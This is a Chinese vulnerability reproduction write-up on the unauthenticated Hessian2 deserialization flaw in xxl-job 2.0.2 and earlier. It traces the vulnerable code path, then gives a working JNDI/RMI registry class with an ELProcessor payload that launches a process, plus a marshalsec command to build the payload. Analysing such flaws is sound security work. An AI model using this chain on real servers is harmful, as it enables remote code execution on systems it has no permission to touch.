xxl-job <=2.0.2 反序列化漏洞

搭建

https://github.com/xuxueli/xxl-job/releases/tag/2.0.2 下载源码，导入idea，mysql导入sql文件，修改数据库配置后运行XxlJobAdminApplication 即可成功启动项目。

漏洞分析

\xxl-job-2.0.2\xxl-job-admin\src\main\java\com\xxl\job\admin\controller\JobApiController.java 中api接口设置了 @PermessionLimit(limit=false) 没有无需登录即可访问

@RequestMapping(AdminBiz.MAPPING)
@PermessionLimit(limit=false)
public void api(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
    XxlJobDynamicScheduler.invokeAdminService(request, response);
}

跟进 invokeAdminService方法

public static void invokeAdminService(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException {
    servletServerHandler.handle(null, request, response);
}

跟进 handle

parseRequest 会对请求进行处理

private XxlRpcRequest parseRequest(HttpServletRequest request) throws Exception {
    // deserialize request
    byte[] requestBytes = readBytes(request);
    if (requestBytes == null || requestBytes.length==0) {
        throw new XxlRpcException("xxl-rpc request data is empty.");
    }
    XxlRpcRequest rpcXxlRpcRequest = (XxlRpcRequest) xxlRpcProviderFactory.getSerializer().deserialize(requestBytes, XxlRpcRequest.class);
    return rpcXxlRpcRequest;
}

这里可以看到有一个反序列化操作，跟进deserialize 看看

deserialize 是一个抽象方法

xxl-job-2.0.2\xxl-job-admin\src\main\java\com\xxl\job\admin\core\schedule\XxlJobDynamicScheduler.java 中

可以得出，上面的反序列化会进入到HessianSerializer类中为hessian2反序列化。

漏洞利用

javax.el.ELProcessor

本地开rmi服务

package RMI;import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import javax.el.ELProcessor;
import org.apache.naming.factory.BeanFactory;public class RmiTest {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1099");
        Registry registry = LocateRegistry.createRegistry(1099);        //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
        ref.add(new StringRefAddr("forceString", "x=eval"));
        //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','mstsc.exe']).start()\")"));        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("Object", referenceWrapper);
    }
}

生成poc

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian2 SpringAbstractBeanFactoryPointcutAdvisor rmi://127.0.0.1:1099/Object >hessian2.dat

注意在burp提交序列化数据需要设置 User-Options ->Display -> Character-sets -> Display as raw bytes 并重开burp

参考

https://kingx.me/Restrictions-and-Bypass-of-JNDI-Manipulations-RCE.html

https://www.cnblogs.com/tr1ple/p/12335098.html